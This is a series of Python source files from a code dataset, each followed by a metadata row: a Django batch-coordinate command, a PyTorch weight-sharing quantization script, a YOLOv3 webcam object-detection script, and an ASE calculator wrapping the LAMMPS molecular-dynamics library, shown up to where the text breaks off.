            # NOTE(review): modern BaseCommand does not define self.args —
            # confirm this error path against the Django version in use.
            raise CommandError('Usage is process_coordinates %s' % self.args)
        loader = batch_loader.BatchLoader()
        _logger.info("batch_list_filename: %s" % batch_list_filename)
        # Context manager guarantees the list file is closed even on error
        # (the original left the handle open).
        with open(batch_list_filename) as batch_list:
            for line in batch_list:
                batch_name = line.strip()
                _logger.info("batch_name: %s" % batch_name)
                parts = batch_name.split("_")
                if len(parts) == 4:
                    loader.process_coordinates(batch_name, strict=False)
                else:
                    _logger.warning("invalid batch name '%s'" % batch_name)
| open-oni/open-oni | core/management/commands/process_coordinates.py | process_coordinates.py | py | 1,291 | python | en | code | 43 | github-code | 6 | [
{
"api_name": "core.management.commands.configure_logging",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.getpid",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name":... |
36294164710 | import argparse
import os
import torch
from net.models import LeNet
from net.quantization import apply_weight_sharing
import util
# CLI: positional argument is the path of the pruned model to quantize.
parser = argparse.ArgumentParser(description='This program quantizes weight by using weight sharing')
parser.add_argument('model', type=str, help='path to saved pruned model')
parser.add_argument('--no-cuda', action='store_true', default=False,
                    help='disables CUDA training')
parser.add_argument('--output', default='saves/model_after_weight_sharing.ptmodel', type=str,
                    help='path to model output')
args = parser.parse_args()
use_cuda = not args.no_cuda and torch.cuda.is_available()

# Define the model
# torch.load deserializes the whole pickled model object (not a state_dict),
# so the model class (LeNet) must be importable at load time.
model = torch.load(args.model)
print('accuracy before weight sharing')
util.test(model, use_cuda)

# Weight sharing
# apply_weight_sharing mutates the model's weights in place (presumably
# clustering them — see net.quantization), hence the re-test afterwards.
apply_weight_sharing(model)
# NOTE(review): "accuacy" typo in the printed message below.
print('accuacy after weight sharing')
util.test(model, use_cuda)

# Save the new model
os.makedirs('saves', exist_ok=True)
torch.save(model, args.output)
| mightydeveloper/Deep-Compression-PyTorch | weight_share.py | weight_share.py | py | 977 | python | en | code | 383 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "torch... |
10253684387 | from __future__ import division
import time
import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
import cv2
from util import *
from darknet import Darknet
import pandas as pd
import colorsys
import random
import pickle as pkl
import argparse
def arg_parse():
    """Build and parse command-line arguments for the video detector.

    Returns an argparse.Namespace with dataset, confidence, nms_thresh,
    cfgfile, weightsfile and reso attributes.
    """
    ap = argparse.ArgumentParser(description='YOLO v3 Video Detection')
    ap.add_argument(
        "--dataset",
        dest="dataset",
        default="pascal",
        help="Dataset on which the network has been trained",
    )
    ap.add_argument(
        "--confidence",
        dest="confidence",
        type=float,
        default=0.5,
        help="Object Confidence to filter predictions",
    )
    ap.add_argument(
        "--nms_thresh",
        dest="nms_thresh",
        type=float,
        default=0.4,
        help="NMS Threshhold",
    )
    ap.add_argument(
        "--cfg",
        dest="cfgfile",
        type=str,
        default="cfg/yolov3.cfg",
        help="Config file",
    )
    ap.add_argument(
        "--weights",
        dest="weightsfile",
        type=str,
        default="yolov3.weights",
        help="weightsfile",
    )
    ap.add_argument(
        "--reso",
        dest="reso",
        type=int,
        default=416,
        help="Input resolution of the network. Increase to increase accuracy. Decrease to increase learning speed",
    )
    return ap.parse_args()
def main():
    """Run webcam object detection: load the Darknet model, then read,
    detect, annotate and display frames until 'q' is pressed."""
    args = arg_parse()
    confidence = args.confidence
    nms_thresh = args.nms_thresh
    start = 0
    CUDA = torch.cuda.is_available()

    classes = load_classes("data/coco.names")
    num_classes = len(classes)

    # Set up the neural network
    print("Loading network.....")
    model = Darknet(args.cfgfile)
    model.load_weights(args.weightsfile)
    print("Network successfully loaded")

    model.net_info["height"] = args.reso
    inp_dim = int(model.net_info["height"])
    # Darknet needs the input side to be a positive multiple of 32.
    assert inp_dim % 32 == 0
    assert inp_dim > 32

    # if there's a GPU available, put the model on GPU
    if CUDA:
        model.cuda()

    # set the model in evaluation mode
    model.eval()

    def write(x, img, color):
        # Draw one detection on img: box corners come from x[1:3]/x[3:5],
        # class index from x[-1].
        c1 = tuple(x[1:3].int())
        c2 = tuple(x[3:5].int())
        cls = int(x[-1])
        label = "{0}".format(classes[cls])
        cv2.rectangle(img, c1, c2, color, 4)
        t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 1, 1)[0]
        c2 = c1[0] + t_size[0] + 3, c1[1] + t_size[1] + 4
        # Filled rectangle as background for the class label text.
        cv2.rectangle(img, c1, c2, color, -1)
        cv2.putText(img, label, (c1[0], c1[1] + t_size[1] + 4), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150, 150, 150), thickness=1)

    # detection phaase
    cap = cv2.VideoCapture(0)  # device 0: default webcam
    assert cap.isOpened(), "Cannot capture source"

    frames = 0
    start = time.time()
    # One visually distinct color per class: sweep the HSV hue circle, then
    # shuffle with a fixed seed so colors are stable across runs.
    hsv_tuples = [(x / num_classes, 1., 1.) for x in range(num_classes)]
    colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
    colors = list(map(lambda x: (int(x[0] * 200), int(x[1] * 200), int(x[2] * 200)), colors))
    np.random.seed(10000)
    np.random.shuffle(colors)
    np.random.seed(None)  # reset seed to default.

    while cap.isOpened():
        ret, frame = cap.read()
        if ret:
            frame = cv2.resize(frame, dsize=(1280, 960))
            img = prep_image(frame, inp_dim)
            print(f"IMG_SHAPE: {img.shape}")
            im_dim = frame.shape[1], frame.shape[0]
            im_dim = torch.FloatTensor(im_dim).repeat(1, 2)

            if CUDA:
                im_dim = im_dim.cuda()
                img = img.cuda()

            with torch.no_grad():
                # NOTE(review): Variable(..., volatile=True) is deprecated;
                # torch.no_grad() already disables autograd here.
                outputs = model(Variable(img, volatile=True), CUDA)
            outputs = write_results(outputs, confidence, num_classes, nms_conf=nms_thresh)

            # NOTE(review): `outputs != None` should be `outputs is not None`;
            # write_results presumably returns a non-tensor sentinel when
            # nothing is detected — confirm.
            if outputs != None:
                im_dim = im_dim.repeat(outputs.size(0), 1)
                # Undo the letterbox scaling so boxes map back to frame pixels.
                scaling_factor = torch.min(inp_dim/im_dim, 1)[0].view(-1, 1)
                outputs[:, [1,3]] -= (inp_dim - scaling_factor * im_dim[:, 0].view(-1,1)) / 2
                outputs[:, [2,4]] -= (inp_dim - scaling_factor * im_dim[:, 1].view(-1,1)) / 2
                outputs[:, 1:5] /= scaling_factor

                # Clamp each box to the frame bounds.
                for i in range(outputs.shape[0]):
                    outputs[i, [1,3]] = torch.clamp(outputs[i, [1,3]], 0.0, im_dim[i, 0])
                    outputs[i, [2,4]] = torch.clamp(outputs[i, [2,4]], 0.0, im_dim[i, 1])

                for output in outputs:
                    color = colors[int(output[-1])]
                    write(output, frame, color)

            cv2.imshow("frame", frame)
            key = cv2.waitKey(1)
            if key & 0xFF == ord('q'):
                break
            frames += 1
            print(time.time() - start)
            print("FPS of the video is {:5.2f}".format( frames / (time.time() - start) ))
        else:
            break

if __name__ == '__main__':
    main()
| pokotsun/pytorch-yolov3-scratch | detect_video.py | detect_video.py | py | 4,780 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "darkn... |
37016298011 | """ASE LAMMPS Calculator Library Version"""
from __future__ import print_function
import os
import ctypes
import operator
import sys
import numpy as np
from numpy.linalg import norm
from lammps import lammps
from ase.calculators.calculator import Calculator
from ase.data import atomic_masses
from ase.atoms import symbols2numbers
import ase.units
import re
# TODO
# 1. should we make a new lammps object each time ?
# 2. upper triangular test does not look good
# 3. lmp object is not closed
# 4. need a routine to get the model back from lammps
# 5. if we send a command to lmps directly then the calculator does
# not know about it and the energy could be wrong.
# 6. do we need a subroutine generator that converts a lammps string
# into a python function that can be called
def is_upper_triangular(mat):
    """Return True when the 3x3 matrix *mat* is numerically upper triangular.

    The three sub-diagonal entries are compared against a fixed 1e-5
    absolute tolerance.
    """
    below_diagonal = (mat[1, 0], mat[2, 0], mat[2, 1])
    return all(abs(entry) < 0.00001 for entry in below_diagonal)
def convert_cell(ase_cell):
    """
    Convert a parallelepiped (forming a right-handed basis) to the
    lower-triangular matrix LAMMPS can accept.  This function transposes
    the cell matrix so the basis vectors are column vectors.

    Returns:
        (cell, transform): ``cell`` is the (possibly rotated) 3x3 cell with
        column-vector basis; ``transform`` maps coordinates into the rotated
        frame, or is ``None`` when no rotation was needed.
    """
    # np.matrix is deprecated in NumPy; a plain ndarray transpose is the
    # exact equivalent of the original np.matrix.transpose call here.
    cell = np.transpose(ase_cell[:, :])
    if not is_upper_triangular(cell) or cell[0, 0] < 0.0 or cell[1, 1] < 0.0 or cell[2, 2] < 0.0:
        # rotate bases into triangular matrix
        tri_mat = np.zeros((3, 3))
        A = cell[:, 0]
        B = cell[:, 1]
        C = cell[:, 2]
        tri_mat[0, 0] = norm(A)
        Ahat = A / norm(A)
        AxBhat = np.cross(A, B) / norm(np.cross(A, B))
        tri_mat[0, 1] = np.dot(B, Ahat)
        tri_mat[1, 1] = norm(np.cross(Ahat, B))
        tri_mat[0, 2] = np.dot(C, Ahat)
        tri_mat[1, 2] = np.dot(C, np.cross(AxBhat, Ahat))
        tri_mat[2, 2] = norm(np.dot(C, AxBhat))

        # create and save the transformation for coordinates
        volume = np.linalg.det(ase_cell)
        trans = np.array([np.cross(B, C), np.cross(C, A), np.cross(A, B)])
        trans = trans / volume
        coord_transform = np.dot(tri_mat, trans)

        return tri_mat, coord_transform
    else:
        return cell, None
# Conversion factors from LAMMPS unit systems to ASE's internal units;
# multiplying a LAMMPS value by the factor yields the ASE value.
# LAMMPS "real" units (grams/mole, Angstrom, fs, kcal/mol, atmospheres).
lammps_real = {
    "mass" : 0.001 * ase.units.kg / ase.units.mol,
    "distance" : ase.units.Angstrom,
    "time" : ase.units.fs,
    "energy" : ase.units.kcal/ase.units.mol,
    "velocity": ase.units.Angstrom / ase.units.fs,
    "force": ase.units.kcal/ase.units.mol/ase.units.Angstrom,
    "pressure" : 101325 * ase.units.Pascal
}

# LAMMPS "metal" units (grams/mole, Angstrom, ps, eV, bars).
lammps_metal = {
    "mass" : 0.001 * ase.units.kg / ase.units.mol,
    "distance" : ase.units.Angstrom,
    "time" : 1e-12 * ase.units.second,
    "energy" : ase.units.eV,
    "velocity": ase.units.Angstrom / (1e-12*ase.units.second),
    "force": ase.units.eV/ase.units.Angstrom,
    "pressure" : 1e5 * ase.units.Pascal
}

# Registry mapping a LAMMPS "units" keyword to its conversion table.
lammps_units={"real":lammps_real,
              "metal":lammps_metal}
def unit_convert(quantity, units='metal'):
    """Return the factor converting *quantity* from LAMMPS *units* to ASE units.

    Raises:
        NotImplementedError: if the unit system or the quantity is unknown.
    """
    try:
        return lammps_units[units][quantity]
    except KeyError:
        # Only a missing unit system / quantity should produce this error;
        # the original bare `except:` also masked unrelated failures.
        raise NotImplementedError("Unit {} in unit system {} is not implemented.".format(quantity, units))
class LAMMPSlib(Calculator):
r"""
LAMMPSlib Interface Documentation
**Introduction**
LAMMPSlib is an interface and calculator for LAMMPS_. LAMMPSlib uses
the python interface that comes with LAMMPS to solve an atoms model
for energy, atom forces and cell stress. This calculator creates a
'.lmp' object which is a running lammps program, so further commands
can be sent to this object executed until it is explicitly closed. Any
additional variables calculated by lammps can also be extracted. This
is still experimental code.
**Arguments**
================= ==========================================================
Keyword Description
================= ==========================================================
``lmpcmds`` list of strings of LAMMPS commands. You need to supply
enough to define the potential to be used e.g.
["pair_style eam/alloy",
"pair_coeff * * potentials/NiAlH_jea.eam.alloy Ni Al"]
``atom_types`` dictionary of "atomic_symbol":lammps_atom_type pairs,
e.g. {'Cu':1} to bind copper to lammps atom type 1.
Default method assigns lammps atom types in order that they
appear in the atoms model. Mandatory.
``log_file`` string
path to the desired LAMMPS log file
``lammps_header`` string to use for lammps setup. Default is to use
metal units and simple atom simulation.
lammps_header=['units metal',
'atom_style atomic',
'atom_modify map array sort 0 0'])
``keep_alive`` Boolean
whether to keep the lammps routine alive for more commands
================= ==========================================================
**Requirements**
To run this calculator you must have LAMMPS installed and compiled to
enable the python interface. See the LAMMPS manual.
If the following code runs then lammps is installed correctly.
>>> from lammps import lammps
>>> lmp = lammps()
The version of LAMMPS is also important. LAMMPSlib is suitable for
versions after approximately 2011. Prior to this the python interface
is slightly different from that used by LAMMPSlib. It is not difficult
to change to the earlier format.
**LAMMPS and LAMMPSlib**
The LAMMPS calculator is another calculator that uses LAMMPS (the
program) to calculate the energy by generating input files and running
a separate LAMMPS job to perform the analysis. The output data is then
read back into python. LAMMPSlib makes direct use of the LAMMPS (the
program) python interface. As well as directly running any LAMMPS
comand line it allows the values of any of LAMMPS variables to be
extracted and returned to python.
**Example**
::
from ase import Atom, Atoms
from lammpslib import LAMMPSlib
cmds = ["pair_style eam/alloy",
"pair_coeff * * NiAlH_jea.eam.alloy Al H"]
a = 4.05
al = Atoms([Atom('Al')], cell=(a, a, a), pbc=True)
h = Atom([Atom('H')])
alh = al + h
lammps = LAMMPSlib(lmpcmds = cmds, logfile='test.log')
alh.set_calculator(lammps)
print "Energy ", alh.get_potential_energy()
**Implementation**
LAMMPS provides a set of python functions to allow execution of the
underlying C++ LAMMPS code. The functions used by the LAMMPSlib
interface are::
from lammps import lammps
lmp = lammps(cmd_args) # initiate LAMMPS object with command line args
lmp.scatter_atoms('x',1,3,positions) # atom coords to LAMMPS C array
lmp.command(cmd) # executes a one line cmd string
lmp.extract_variable(...) # extracts a per atom variable
lmp.extract_global(...) # extracts a global variable
lmp.close() # close the lammps object
For a single atom model the following lammps file commands would be run
by invoking the get_potential_energy() method::
units metal
atom_style atomic
atom_modify map array sort 0 0
region cell prism 0 xhi 0 yhi 0 zhi xy xz yz units box
create_box 1 cell
create_atoms 1 single 0 0 0 units box
mass * 1.0
## user lmpcmds get executed here
pair_style eam/alloy
pair_coeff * * lammps/potentials/NiAlH_jea.eam.alloy Al
## end of user lmmpcmds
run 0
**Notes**
.. _LAMMPS: http://lammps.sandia.gov/
* Units: The default lammps_header sets the units to Angstrom and eV
and for compatibility with ASE Stress is in GPa.
* The global energy is currently extracted from LAMMPS using
extract_variable since lammps.lammps currently extract_global only
accepts the following ['dt', 'boxxlo', 'boxxhi', 'boxylo', 'boxyhi',
'boxzlo', 'boxzhi', 'natoms', 'nlocal'].
* If an error occurs while lammps is in control it will crash
Python. Check the output of the log file to find the lammps error.
* If the are commands direfctly sent to the LAMMPS object this may
change the energy value of the model. However the calculator will not
know of it and still return the original energy value.
End LAMMPSlib Interface Documentation
"""
implemented_properties = ['energy', 'forces', 'stress']
#NB
started = False
initialized = False
default_parameters = dict(
atom_types=None,
log_file=None,
lammps_name='',
keep_alive=False,
lammps_header=['units metal',
'atom_style atomic',
'atom_modify map array sort 0 0'],
boundary=True,
create_box=True,
create_atoms=True,
read_molecular_info=False,
comm=None)
def parse_bonds(self, atoms):
    """Parse the per-atom 'bonds' array into atoms.bonds.

    Each entry is '_' (no bonds) or a comma-separated list of
    'partner(type)' items; the result is a list of 1-based
    (type, i+1, partner+1) tuples, and atoms.max_n_bonds records the
    largest per-atom bond count.
    """
    # Raw string: '\d' in a plain literal is an invalid escape sequence
    # (SyntaxWarning on Python >= 3.12).  Compile once, outside the loops.
    bond_re = re.compile(r'(\d+)\((\d+)\)')
    atoms.bonds = []
    atoms.max_n_bonds = 0
    for i in range(len(atoms)):
        if atoms.arrays['bonds'][i] != '_':
            n_bonds = 0
            for bond_list in atoms.arrays['bonds'][i].split(','):
                n_bonds += 1
                m = bond_re.match(bond_list)
                atoms.bonds.append((int(m.group(2)), i + 1, int(m.group(1)) + 1))
            atoms.max_n_bonds = max(atoms.max_n_bonds, n_bonds)
def set_bonds(self, atoms):
    """Issue one LAMMPS create_bonds command per bond parsed by parse_bonds."""
    for bond_type, atom_i, atom_j in atoms.bonds:
        self.lmp.command('create_bonds single/bond {} {} {} '.format(bond_type, atom_i, atom_j))
def parse_angles(self, atoms):
    """Parse the per-atom 'angles' array into atoms.angles.

    Entries look like 'j-k(type)'; the result is a list of 1-based
    (type, j+1, i+1, k+1) tuples (central atom i in the middle), and
    atoms.max_n_angles records the largest per-atom angle count.
    """
    # Raw string avoids the invalid '\d' escape warning on Python >= 3.12.
    angle_re = re.compile(r'(\d+)\-(\d+)\((\d+)\)')
    atoms.angles = []
    atoms.max_n_angles = 0
    for i in range(len(atoms)):
        if atoms.arrays['angles'][i] != '_':
            n_angles = 0
            for angle_list in atoms.arrays['angles'][i].split(','):
                n_angles += 1
                m = angle_re.match(angle_list)
                atoms.angles.append((int(m.group(3)), int(m.group(1)) + 1, i + 1, int(m.group(2)) + 1))
            atoms.max_n_angles = max(atoms.max_n_angles, n_angles)
def set_angles(self, atoms):
    # Issue one create_bonds command per angle; (t, i1, i2, i3) are the
    # 1-based type and atom ids produced by parse_angles.
    for (t, i1, i2, i3) in atoms.angles:
        self.lmp.command('create_bonds single/angle {} {} {} {}'.format(t, i1, i2, i3))
def parse_dihedrals(self, atoms):
    """Parse the per-atom 'dihedrals' array into atoms.dihedrals.

    Entries look like 'j-k-l(type)'; the result is a list of 1-based
    (type, i+1, j+1, k+1, l+1) tuples, and atoms.max_n_dihedrals records
    the largest per-atom dihedral count.
    """
    # Raw string avoids the invalid '\d' escape warning on Python >= 3.12.
    dihedral_re = re.compile(r'(\d+)\-(\d+)\-(\d+)\((\d+)\)')
    atoms.dihedrals = []
    atoms.max_n_dihedrals = 0
    for i in range(len(atoms)):
        if atoms.arrays['dihedrals'][i] != '_':
            n_dihedrals = 0
            for dihedral_list in atoms.arrays['dihedrals'][i].split(','):
                n_dihedrals += 1
                m = dihedral_re.match(dihedral_list)
                atoms.dihedrals.append((int(m.group(4)), i + 1, int(m.group(1)) + 1, int(m.group(2)) + 1, int(m.group(3)) + 1))
            atoms.max_n_dihedrals = max(atoms.max_n_dihedrals, n_dihedrals)
def set_dihedrals(self, atoms):
    # Issue one create_bonds command per dihedral; (t, i1..i4) are the
    # 1-based type and atom ids produced by parse_dihedrals.
    for (t, i1, i2, i3, i4) in atoms.dihedrals:
        self.lmp.command('create_bonds single/dihedral {} {} {} {} {}'.format(t, i1, i2, i3, i4))
def parse_impropers(self, atoms):
    """Parse the per-atom 'impropers' array into atoms.impropers.

    Entries look like 'j-k-l(type)'; the result is a list of 1-based
    (type, i+1, j+1, k+1, l+1) tuples, and atoms.max_n_impropers records
    the largest per-atom improper count.
    """
    # Raw string avoids the invalid '\d' escape warning on Python >= 3.12.
    improper_re = re.compile(r'(\d+)\-(\d+)\-(\d+)\((\d+)\)')
    atoms.impropers = []
    atoms.max_n_impropers = 0
    for i in range(len(atoms)):
        if atoms.arrays['impropers'][i] != '_':
            n_impropers = 0
            for improper_list in atoms.arrays['impropers'][i].split(','):
                n_impropers += 1
                m = improper_re.match(improper_list)
                atoms.impropers.append((int(m.group(4)), i + 1, int(m.group(1)) + 1, int(m.group(2)) + 1, int(m.group(3)) + 1))
            atoms.max_n_impropers = max(atoms.max_n_impropers, n_impropers)
def set_impropers(self, atoms):
    # NOTE(review): unlike the other setters this issues `create_improper`
    # rather than `create_bonds single/improper` — confirm against the
    # LAMMPS command set in use.
    for (t, i1, i2, i3, i4) in atoms.impropers:
        self.lmp.command('create_improper {} {} {} {} {}'.format(t, i1, i2, i3, i4))
def set_charges(self, atoms):
    """Copy per-atom 'mmcharge' values onto the LAMMPS atoms (1-based ids)."""
    charges = atoms.arrays['mmcharge']
    for atom_id, charge in enumerate(charges, start=1):
        self.lmp.command('set atom {} charge {} '.format(atom_id, charge))
def set_cell(self, atoms, change=False):
    # Convert the ASE cell to LAMMPS' triangular representation; the
    # returned transform (if any) must also be applied to positions,
    # velocities and forces elsewhere in this calculator.
    lammps_cell, self.coord_transform = convert_cell(atoms.get_cell())
    xhi = lammps_cell[0, 0]
    yhi = lammps_cell[1, 1]
    zhi = lammps_cell[2, 2]
    xy = lammps_cell[0, 1]
    xz = lammps_cell[0, 2]
    yz = lammps_cell[1, 2]
    if change:
        # Resize the box of an already-initialised simulation in place.
        cell_cmd = 'change_box all x final 0 {} y final 0 {} z final 0 {} xy final {} xz final {} yz final {}'\
            .format(xhi, yhi, zhi, xy, xz, yz)
    else:
        # just in case we'll want to run with a funny shape box, and here
        # command will only happen once, and before any calculation
        if self.parameters.create_box:
            self.lmp.command('box tilt large')
        cell_cmd = 'region cell prism 0 {} 0 {} 0 {} {} {} {} units box'\
            .format(xhi, yhi, zhi, xy, xz, yz)
    self.lmp.command(cell_cmd)
def set_lammps_pos(self, atoms):
    # Positions converted to the active LAMMPS unit system.
    pos = atoms.get_positions() / unit_convert("distance", self.units)

    # If necessary, transform the positions to new coordinate system
    if self.coord_transform is not None:
        pos = np.dot(self.coord_transform, np.matrix.transpose(pos))
        pos = np.matrix.transpose(pos)

    # Convert ase position matrix to lammps-style position array
    # (flat x0,y0,z0,x1,... sequence, as scatter_atoms expects).
    lmp_positions = list(pos.ravel())

    # Convert that lammps-style array into a C object
    lmp_c_positions = \
        (ctypes.c_double * len(lmp_positions))(*lmp_positions)
    # self.lmp.put_coosrds(lmp_c_positions)
    self.lmp.scatter_atoms('x', 1, 3, lmp_c_positions)
def calculate(self, atoms, properties, system_changes):
    """ASE Calculator entry point; delegates to propagate() with 0 MD steps."""
    self.propagate(atoms, properties, system_changes, 0)
def propagate(self, atoms, properties, system_changes, n_steps, dt=None,
              dt_not_real_time=False, velocity_field=None):
    """Run n_steps of MD (0 for a single-point calculation) and collect
    energy, forces and stress into self.results.

    atoms: Atoms object
        Contains positions, unit-cell, ...
    properties: list of str
        List of what needs to be calculated.  Can be any combination
        of 'energy', 'forces', 'stress', 'dipole', 'charges', 'magmom'
        and 'magmoms'.
    system_changes: list of str
        List of what has changed since last calculation.  Can be
        any combination of these five: 'positions', 'numbers', 'cell',
        'pbc', 'charges' and 'magmoms'.
    """
    if len(system_changes) == 0:
        return

    self.coord_transform = None

    if not self.started:
        self.start_lammps()

    ########################################################################
    # NB
    if not self.initialized:
        self.initialise_lammps(atoms)
    else:  # Still need to reset cell
        # Reset positions so that if they are crazy from last propagation,
        # change_box (in set_cell()) won't hang.
        # Could do this only after testing for crazy positions?
        # Could also use scatter_atoms() to set values (requires MPI comm),
        # or extra_atoms() to get pointers to local data structures to zero,
        # but then will have to be careful with parallelism
        self.lmp.command("set atom * x 0.0 y 0.0 z 0.0")
        self.set_cell(atoms, change=True)

    if self.parameters.atom_types is None:
        raise NameError("atom_types are mandatory.")

    # Decide whether the LAMMPS atom set must be rebuilt (count changed) or
    # merely retyped (same count, different species).
    do_rebuild = False
    do_redo_atom_types = False
    try:
        do_rebuild = (len(atoms.numbers) != len(self.previous_atoms_numbers)) or ("numbers" in system_changes)
        if not do_rebuild:
            do_redo_atom_types = (
                atoms.numbers != self.previous_atoms_numbers).any()
    except Exception:
        pass

    self.lmp.command('echo none')  # don't echo the atom positions
    if do_rebuild:
        self.rebuild(atoms)
    elif do_redo_atom_types:
        self.redo_atom_types(atoms)
    self.lmp.command('echo log')  # switch back log

    self.set_lammps_pos(atoms)

    if n_steps > 0:  # TODO: here are velocities passed onto LAMMPS
        if velocity_field is None:
            vel = atoms.get_velocities() / unit_convert("velocity",
                                                        self.units)
        else:
            vel = atoms.arrays[velocity_field]

        # If necessary, transform the velocities to new coordinate system
        if self.coord_transform is not None:
            vel = np.dot(self.coord_transform, np.matrix.transpose(vel))
            vel = np.matrix.transpose(vel)

        # Convert ase velocities matrix to lammps-style velocities array
        lmp_velocities = list(vel.ravel())

        # Convert that lammps-style array into a C object
        lmp_c_velocities = \
            (ctypes.c_double * len(lmp_velocities))(*lmp_velocities)
        # self.lmp.put_coords(lmp_c_velocities)
        self.lmp.scatter_atoms('v', 1, 3, lmp_c_velocities)

    # Keep atoms fixed
    # # RY: use LAMMPS_init_cmds to set up NVE,
    # # e.g. group fixed id <= X; group mobile id > X; fix 1 mobile nve
    # keep_atoms_fixed = int(sum([x == 0 for x in lmp_velocities]) / 3)
    # if keep_atoms_fixed > 0:
    #     self.lmp.command("group fixed id <= " + str(keep_atoms_fixed))
    #     self.lmp.command("group mobile id > " + str(keep_atoms_fixed))
    # self.lmp.command("fix freeze fixed setforce 0.0 0.0 0.0")
    # if atoms.info["set_wall"]:
    #     self.lmp.command("fix walls all wall/reflect zlo 0 zhi "
    #                      + str(atoms.cell[2, 2]) + " units box")
    # TODO: if we fix forces here, then it should be passed on, just
    # pass on keep_atoms_fixed
    # TODO: if you have atoms with EXACTLY zero velocities, then freeze
    # them
    # TODO: keep_atoms_fixed = 0 for potential energy calculations of the
    # initial configurations

    # Run for 0 time to calculate
    if dt is not None:
        if dt_not_real_time:
            self.lmp.command('timestep %.30f' % dt)
        else:
            self.lmp.command('timestep %.30f' % (dt/unit_convert("time", self.units)))
    self.lmp.command('run %d' % n_steps)

    if n_steps > 0:
        # Copy the propagated positions/velocities back into the Atoms
        # object (converted to ASE units, un-rotated when needed).
        # TODO this must be slower than native copy, but why is it broken?
        pos = np.array([x for x in self.lmp.gather_atoms("x", 1, 3)]).reshape(-1, 3)
        if self.coord_transform is not None:
            pos = np.dot(pos, self.coord_transform)

        atoms.set_positions(pos * unit_convert("distance", self.units))

        vel = np.array([v for v in self.lmp.gather_atoms("v", 1, 3)]).reshape(-1, 3)
        if self.coord_transform is not None:
            vel = np.dot(vel, self.coord_transform)
        if velocity_field is None:
            atoms.set_velocities(vel * unit_convert("velocity", self.units))

        if velocity_field is not None:
            # NOTE(review): fix id '1' is assumed to be a wall/reflect-style
            # fix providing reflection/reversal counters — confirm against
            # the user-supplied lmpcmds.
            nreflects = self.lmp.extract_fix('1', 0, 1, 0)
            atoms.info['nreflects'] = nreflects
            nreversals = self.lmp.extract_fix('1', 0, 1, 1)
            atoms.info['nreversals'] = nreversals

    # Extract the forces and energy
    # if 'energy' in properties:
    self.results['energy'] = self.lmp.extract_variable('pe', None, 0) * unit_convert("energy", self.units)
    # self.results['energy'] = self.lmp.extract_global('pe', 0)

    # if 'stress' in properties:
    # Stress in Voigt order (xx, yy, zz, yz, xz, xy).
    stress = np.empty(6)
    # stress_vars = ['pxx', 'pyy', 'pzz', 'pxy', 'pxz', 'pyz']
    stress_vars = ['pxx', 'pyy', 'pzz', 'pyz', 'pxz', 'pxy']
    for i, var in enumerate(stress_vars):
        stress[i] = self.lmp.extract_variable(var, None, 0)

    # Rotate the stress tensor back to the ASE frame when the cell was
    # rotated for LAMMPS.
    stress_mat = np.zeros((3, 3))
    stress_mat[0, 0] = stress[0]
    stress_mat[1, 1] = stress[1]
    stress_mat[2, 2] = stress[2]
    stress_mat[1, 2] = stress[3]
    stress_mat[2, 1] = stress[3]
    stress_mat[0, 2] = stress[4]
    stress_mat[2, 0] = stress[4]
    stress_mat[0, 1] = stress[5]
    stress_mat[1, 0] = stress[5]
    if self.coord_transform is not None:
        stress_mat = np.dot(self.coord_transform.T, np.dot(stress_mat, self.coord_transform))
    stress[0] = stress_mat[0, 0]
    stress[1] = stress_mat[1, 1]
    stress[2] = stress_mat[2, 2]
    stress[3] = stress_mat[1, 2]
    stress[4] = stress_mat[0, 2]
    stress[5] = stress_mat[0, 1]

    # Sign flip: LAMMPS reports pressure, ASE expects stress.
    self.results['stress'] = stress * (-unit_convert("pressure", self.units))

    # if 'forces' in properties:
    f = np.zeros((len(atoms), 3))
    f[:, :] = np.array([x for x in self.lmp.gather_atoms("f", 1, 3)]).reshape(-1, 3)
    f *= unit_convert("force", self.units)

    if self.coord_transform is not None:
        self.results['forces'] = np.dot(f, self.coord_transform)
    else:
        self.results['forces'] = f.copy()

    if not self.parameters.keep_alive:
        self.lmp.close()
def lammpsbc(self, pbc, fix):
    """Map an ASE boundary flag to the LAMMPS boundary style letter.

    Returns 'p' (periodic) when pbc is true, otherwise 'f' (fixed) when
    fix is true, else 's' (shrink-wrapped).
    """
    if pbc:
        return 'p'
    return 'f' if fix else 's'
def rebuild(self, atoms):
    """Grow or shrink the LAMMPS atom set to match *atoms*, then retype.

    New atoms are created at random positions (their real positions are
    scattered to LAMMPS later); surplus atoms are deleted by id.
    """
    try:
        n_diff = len(atoms.numbers) - len(self.previous_atoms_numbers)
    except Exception:
        # First call: previous_atoms_numbers does not exist yet, so treat
        # every atom as new.  (Was a bare `except:`.)
        n_diff = len(atoms.numbers)

    if n_diff > 0:
        if any([("reax/c" in cmd) for cmd in self.parameters.lmpcmds]):
            # Temporarily switch to a simple pair style before creating atoms.
            # NOTE(review): the user pair commands are re-applied immediately
            # below, *before* create_atoms — confirm this ordering is intended.
            self.lmp.command("pair_style lj/cut 2.5")
            self.lmp.command("pair_coeff * * 1 1")

            for cmd in self.parameters.lmpcmds:
                if ("pair_style" in cmd) or ("pair_coeff" in cmd):
                    self.lmp.command(cmd)

        cmd = "create_atoms 1 random {} 1 NULL".format(n_diff)
        self.lmp.command(cmd)
    elif n_diff < 0:
        cmd = "group delatoms id {}:{}".format(len(atoms.numbers) + 1, len(self.previous_atoms_numbers))
        self.lmp.command(cmd)
        cmd = "delete_atoms group delatoms"
        self.lmp.command(cmd)

    self.redo_atom_types(atoms)
def redo_atom_types(self, atoms):
    """Reassign LAMMPS atom types so they match ``atoms``.

    Only atoms whose ``(id, type)`` pair differs from the previously
